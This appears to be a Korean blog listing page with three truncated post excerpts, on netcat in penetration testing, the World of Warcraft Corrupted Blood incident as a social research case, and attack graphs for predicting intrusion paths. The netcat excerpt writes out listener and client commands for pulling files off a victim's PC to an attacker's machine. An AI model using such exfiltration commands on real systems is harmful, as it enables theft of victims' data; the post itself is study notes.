네른

넷캣은 네트워크를 통해 호스트간 간단한 데이터를 읽고 쓰는 데 주로 사용되는 유틸리티이다. telnet 등을 이용할 때 종종 이용하곤 하는데, 모의해킹 관련 공부를 진행하면서 모의해킹에도 주로 사용하는 기능이 있다고 해서 정리해보았다. 공격자가 피해자의 PC에 접속한 경우, 피해자의 PC에서 특정 파일을 빼내오고싶을 때 종종 사용하는 기능이다. 크게 클라이언트와 서버측으로 나누어보자 서버(공격자 PC) nc -lvp port_num > 저장할 파일 명 클라이언트(피해자 PC) nc -q 0 ip_addr port_num 이렇게 하면, 공격자 측에서 포트를 열어두고 피해자 측에서 nc를 통해 접속해서 파일을 전송할 수 있음 --> linux 계열에서 < 의 의미를 생각해보면 알 ..

흔히, 온라인 게임을 하나의 작은 사회라고 말하는 사람들이 있다. 실제로 온라인 게임은 실제 사회와 큰 유사성을 보이기에 다양한 사회 현상의 연구에 사용되어왔다. - 대표적으로, World of Warcraft의 오염된 피 사건이 있다. - https://ko.wikipedia.org/wiki/%EC%98%A4%EC%97%BC%EB%90%9C_%ED%94%BC_%EC%82%AC%EA%B1%B4 오염된 피 사건 - 위키백과, 우리 모두의 백과사전 위키백과, 우리 모두의 백과사전. 둘러보기로 가기 검색하러 가기 《월드 오브 워크래프트》의 대도시 중 하나인 아이언포지. "오염된 피"는 npc와 플레이어 사이로 확산되었다. 오염된 피 사건(영어: Corrupted Blood incident)은 2005년 9월 ..

대학원 입학 후, 처음으로 맡게 된 프로젝트 내용이 바로 이 Attack Graph에 관한 내용이었다. Attack Graph는 1999년 Schneier, Bruce의 "Attack trees"라는 논문에서 처음 소개된 개념으로, 공격자의 관점에서 공격자가 시스템에 침입하기 위한 경로를 예측하는 기법이다. Attack Graph는 분석 대상이 되는 시스템 내에 존재하는 호스트 혹은 프로세스에 대한 모든 연결 정보를 그래프(Graph) 형태로 나타낸다. 이후, 사용 가능한 취약점, 취약한 네트워크 환경 설정(방화벽, IDS 규칙 등), 자산 중요도 등을 토대로 공격 경로를 예측한다. - 사용 가능한 취약점은 보통 CVE를 기반으로 한다. - CVE는 Common Vulnerabilities and Exp..